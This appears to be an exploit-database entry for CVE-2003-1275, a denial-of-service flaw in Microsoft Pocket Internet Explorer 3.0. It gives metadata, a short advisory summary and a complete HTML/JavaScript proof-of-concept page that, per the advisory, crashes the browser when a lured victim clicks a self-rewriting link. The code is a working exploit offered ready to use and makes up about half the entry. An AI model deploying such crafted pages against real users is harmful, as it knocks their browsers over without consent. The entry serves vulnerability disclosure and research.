Microsoft Pocket Internet Explorer 3.0 - Denial of Service

Author: Christopher Sogge Røtnes
type: dos
platform: windows
port: 
date_added: 2003-01-03  
date_updated: 2012-10-20  
verified: 1  
codes: CVE-2003-1275;OSVDB-60282  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 22119.html  

source: https://www.securityfocus.com/bid/6507/info

A denial of service vulnerability has been reported for Pocket Internet Explorer (PIE). The vulnerability is due to the way some JavaScript code is interpreted by PIE.

By enticing a victim user to browse a maliciously crafted web page an attacker can cause PIE to crash.

<html> <head>
<script language="Javascript">
function displayPage(page){
if(page=="onload"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">Crash
me</a>";}
if(page=="crash"){
main.innerHTML="<a href=\"#\" onClick=\"displayPage('crash');\">crash!</a>";}
}
</script> </head>
<body onLoad="displayPage('onload');"> <hr> <span id="main"></span> </body> </html>